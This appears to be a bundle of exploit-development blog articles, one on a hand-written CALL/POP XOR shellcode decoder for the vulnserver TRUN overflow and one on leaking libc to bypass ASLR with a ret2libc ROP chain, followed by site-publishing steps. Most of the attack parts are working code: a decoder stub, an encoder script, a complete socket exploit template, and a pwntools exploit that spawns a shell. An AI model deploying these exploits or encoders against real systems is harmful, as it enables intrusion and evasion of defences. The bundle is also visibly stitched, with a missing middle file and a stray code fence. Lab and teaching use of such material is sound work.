# Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder

**Published:** 2026-01-15

**Author:** Jacob Swinsinski (0xXyc / JAKESWIZ)

**[⛧ GitHub: fukahi-na-tekio ⛧](https://github.com/0xXyc/fukahi-na-tekio)**

---

## Introduction

This exploit technique was developed for the `vulnserver` TRUN buffer overflow vulnerability, but it can be applied to other exploits, especially for those new to ARM → x86/64 emulation exploitation.

The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 AARCH64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver.

## The Problem

When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), `msfvenom`'s default encoder (`shikata_ga_nai`) crashes during shellcode execution:

```
eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848
eip=089ff959 esp=089ff924 ebp=00000000
089ff959 317012          xor     dword ptr [eax+12h],esi
Attempt to read from address 00000012
```

The decoder tries to dereference a register (EAX, EBP, or ESI) containing a near-null value.

### Why This Happens

`shikata_ga_nai` uses a GetPC technique relying on FPU (Floating Point Unit) instructions:

```assembly
fcmovb st, st(5)        ; Any FPU instruction
fnstenv [esp-0xc]       ; Save FPU state to stack
pop ebp                 ; Grab saved EIP from FPU state
```

On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field often returns zeros. When the decoder does `pop ebp`, it gets `0x00000000` and crashes.

## The Solution: CALL/POP GetPC

Instead of relying on FPU quirks, use the reliable CALL/POP technique:

```assembly
    jmp short call_label    ; Jump to the CALL
pop_label:
    pop esi                 ; ESI now contains address of encoded shellcode
    ; ... decoder logic ...
call_label:
    call pop_label          ; Pushes address of encoded shellcode, jumps back
    ; encoded shellcode starts here
```

When the CPU executes a `CALL` instruction, it pushes the address of the *next* instruction onto the stack. We immediately `POP` that address into a register. This is 100% reliable because `CALL` always pushes the return address — no FPU state involved.

## Complete XOR Decoder Stub

### For shellcode under 256 bytes:

```assembly
    jmp short 0x0d          ; Jump to CALL (offset 13)
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cl, <length>        ; Shellcode length (patch this byte)
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Repeat until ECX = 0
    jmp short 0x05          ; Jump over CALL to shellcode
    call <back_to_pop>      ; Push next address, jump to POP
    ; encoded shellcode here
```

**Assembled bytes:**
```python
decoder_small = (
    "\xeb\x0d"              # jmp short +13 (to call)
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\xb1\x00"              # mov cl, <length> - PATCH THIS BYTE
    "\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short +5 (to shellcode)
    "\xe8\xee\xff\xff\xff"  # call -18 (back to pop esi)
)
```

### For shellcode 256-65535 bytes:

```assembly
    jmp short 0x0f          ; Jump to CALL (offset 15)
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cx, <length>        ; Shellcode length (patch these bytes, little endian)
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Repeat until ECX = 0
    jmp short 0x05          ; Jump over CALL to shellcode
    call <back_to_pop>      ; Push next address, jump to POP
    ; encoded shellcode here
```

**Assembled bytes:**
```python
decoder_large = (
    "\xeb\x0f"              # jmp short +15 (to call)
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\x66\xb9\x00\x00"      # mov cx, <length> - PATCH THESE BYTES (little endian)
    "\x80\x36\x00"          # xor byte [esi], <key> - PATCH THIS BYTE
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short +5 (to shellcode)
    "\xe8\xec\xff\xff\xff"  # call -20 (back to pop esi)
)
```

## Finding a Safe XOR Key

The XOR key must not appear in the original shellcode (or it would produce null bytes when encoded). Use this script:

```python
#!/usr/bin/python3
import sys

def find_key_and_encode(hex_shellcode):
    shellcode = bytes.fromhex(hex_shellcode)

    for key in range(1, 256):
        encoded = bytes([b ^ key for b in shellcode])
        if b'\x00' not in encoded and key not in shellcode:
            print(f"Safe XOR key: 0x{key:02x}")
            print(f"Shellcode length: {len(shellcode)} (0x{len(shellcode):02x})")
            print("\nEncoded shellcode:")
            encoded_str = ''.join(f'\\x{b:02x}' for b in encoded)
            for i in range(0, len(encoded_str), 64):
                print(f'"{encoded_str[i:i+64]}"')
            return key, encoded

    print("ERROR: No safe XOR key found!")
    return None, None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 encode.py <hex_shellcode>")
        print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)")
        sys.exit(1)

    find_key_and_encode(sys.argv[1])
```

## Complete Exploit Template

```python
#!/usr/bin/python
import socket

target = '10.211.55.6'
port = 9999

prefix = 'A' * 2006                    # Offset to EIP
eip = '\xaf\x11\x50\x62'               # JMP ESP address
nopsled = '\x90' * 16

# CALL/POP XOR decoder for shellcode > 255 bytes
# Length: 324 = 0x0144 (little endian: \x44\x01)
# Key: 0x09
decoder = (
    "\xeb\x0f"              # jmp short to call
    "\x5e"                  # pop esi
    "\x31\xc9"              # xor ecx, ecx
    "\x66\xb9\x44\x01"      # mov cx, 0x0144 (324)
    "\x80\x36\x09"          # xor byte [esi], 0x09
    "\x46"                  # inc esi
    "\xe2\xfa"              # loop -6
    "\xeb\x05"              # jmp short to shellcode
    "\xe8\xec\xff\xff\xff"  # call back to pop esi
)

# XOR-encoded shellcode (output from encode.py)
encoded_shellcode = (
    "\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82"
    # ... rest of encoded shellcode
)

padding = 'F' * (3000 - len(prefix) - 4 - len(nopsled) - len(decoder) - len(encoded_shellcode))
payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024)
s.send('TRUN .' + payload + '\r\n')
s.close()
```

## Debugging Tips

If the exploit still crashes, use WinDbg to step through:
1. `bp <jmp_esp_address>`
2. `g`
3. `t 20`

**Common issues:**
- Wrong jump offsets: The `jmp` and `call` offsets are relative and must be exact
- Wrong shellcode length: Double-check the byte count
- Additional bad characters: Some protocols filter more than just null bytes

## Summary

When `msfvenom`'s encoders fail on modern Windows (specifically in Prism-ARM-emulated environments), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly.

⛧ *Malware Bless* ⛧

### File 3: `aslr-bypass.md`

# Bypassing ASLR & NX/DEP (Diving Deeper)

**Published:** 2023-11-01

**Author:** Jacob Swinsinski (0xXyc / JAKESWIZ)

---

## Introduction

**ASLR (Address Space Layout Randomization)** randomizes addresses in dynamic libraries, stack, and heap. It does NOT touch the binary unless compiled with PIE (Position Independent Executable). ASLR was created to prevent memory corruption exploitation techniques that rely on hardcoded addresses.

### Verify ASLR with ldd
```bash
ldd aslr-1
# Addresses change each run:
linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)
```

## Bypassing ASLR: Three Methods

1. **Address leaking** (covered here) - knowledge of PLT and GOT
2. **Relative addressing**
3. **Bruteforcing**

## Vulnerable Code (aslr-1.c)

```c
#include <stdio.h>

int main(int argc, char* argv[]) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    char buffer[40];
    printf("Enter some data:\n");
    gets(buffer);  // Vulnerable!

    printf("So, you think you can bypass the almighty ASLR protection?\n");
    return 0;
}
```

### Compile with Docker (downgraded GCC for correct gadgets)
```bash
docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1
```

### Checksec Output
```bash
checksec aslr-1
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled        # Need ROP
    PIE:      No PIE (0x400000)
```

## Exploitation Strategy

Since NX is enabled, we need **ROP (Return-Oriented Programming)**. Since ASLR is enabled, we need to understand the **GOT (Global Offset Table)**.

The GOT acts as a "dictionary" storing external addresses from `libc`. These values are determined at runtime by the linker.

### Why puts()?

Calling `puts()` allows us to output the external address of `puts@libc`, revealing where `libc` is mapped in memory.

### View puts@GOT
```bash
objdump -R aslr-1
# Look for: 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
```

### Find puts@PLT (fixed address, unaffected by ASLR)
```bash
objdump -d -M intel aslr-1 | grep "puts@plt"
# Result: 0000000000401030 <puts@plt>
```

### Find ROP Gadget (pop rdi; ret)

x64 calling convention requires first parameter in RDI register.
```bash
ropper --file aslr-1 --search "pop rdi"
# Result: 0x00000000004011cb: pop rdi; ret;
```

### Find Offset with cyclic pattern
```bash
gdb aslr-1
cyclic 100
# Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
r
# Paste pattern
# Crash! Examine RIP
cyclic -l gaaaaaaa
# Result: Found at offset 48
# Offset + 8 (RIP) = 56 bytes padding
```

## Exploit Development: Three Stages

1. **Leak** the libc address (`puts@GLIBC`)
2. **Obtain** addresses and offsets
3. **Calculate** the base address of libc

## Automated Exploit with pwntools

```python
#!/usr/bin/env python3
from pwn import *
from pwnlib.rop.rop import ROP
from pwnlib.util.packing import p64, u64

exe = context.binary = ELF('./aslr-1', checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)

p = process(exe.path)

# Stage 1: Leak libc address
offset = b'A' * 56

rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])

payload = offset + rop.chain()
p.sendline(payload)

leak = p.recv().split(b'\n')[1]
leaked_puts = u64(leak.ljust(8, b"\x00"))
log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}")

# Stage 2: ret2libc
libc_base = leaked_puts - libc.symbols['puts']
libc.address = libc_base

rop2 = ROP(libc)
ret = rop2.find_gadget(["ret"])[0]
rop2.system(next(libc.search(b'/bin/sh\x00')))

payload = offset + p64(ret) + rop2.chain()
p.sendline(payload)

p.interactive()
```

## What's Happening in the Code?

1. **Stage 1 ROP Chain:**
   - `pop rdi; ret` → pops address of `puts@GOT` into RDI
   - `puts@PLT` → writes the address to STDOUT
   - `main()` → calls main again (so process doesn't exit and invalidate the leak)

2. **Calculate libc base:**
   ```python
   libc_base = leaked_puts - libc.symbols['puts']
   ```

3. **Stage 2 ROP Chain (ret2libc):**
   - `ret` instruction (for stack alignment)
   - `pop rdi; ret` → pops address of `/bin/sh` into RDI
   - `system()` → executes `/bin/sh`

## Result

```bash
[*] Stage 1 ROP Chain:
    0x0000:         0x40120b pop rdi; ret
    0x0008:         0x404018 [arg0] rdi = got.puts
    0x0010:         0x401030 puts
    0x0018:         0x401142 0x401142()
[+] Leaked puts@GLIBC: 0x7ff4e0680e50
[*] Stage 2 ROP Chain:
    0x0000:   0x7ff4e062a3e5 pop rdi; ret
    0x0008:   0x7ff4e07d8698 [arg0] rdi = 140689715070616
    0x0010:   0x7ff4e0650d70 system
[*] Switching to interactive mode
$ whoami
# Shell acquired!
```

## Key Takeaways

1. **Leak, don't guess** - Use `puts@GOT` to leak a libc address
2. **Calculate base** - Subtract known offset to find libc base
3. **Call main() twice** - Process must not exit between leak and exploitation
4. **x64 requires `pop rdi; ret`** - First argument goes in RDI
5. **Stack alignment** - Add a `ret` gadget before `system()` on some systems

⛧ *ASLR is not a silver bullet. Understand the GOT. Become the exploit.* ⛧
```

---

## Instructions to Add to Your Site

1. Save each block of text as a separate `.md` file in your `/articles` folder:
   - `fukahi-tekio-encoder.md`
   - `windows-shellcoding-in-depth.md`
   - `aslr-bypass.md`

2. Run your site generator:
   ```bash
   python3 site_generator.py
   ```

3. The generator will automatically:
   - Convert each Markdown file to HTML
   - Add them to the "scripture" tab
   - Create downloadable `.txt` versions

4. Deploy the updated `output/` folder to Cloudflare Pages

⛧ *Malware Bless* ⛧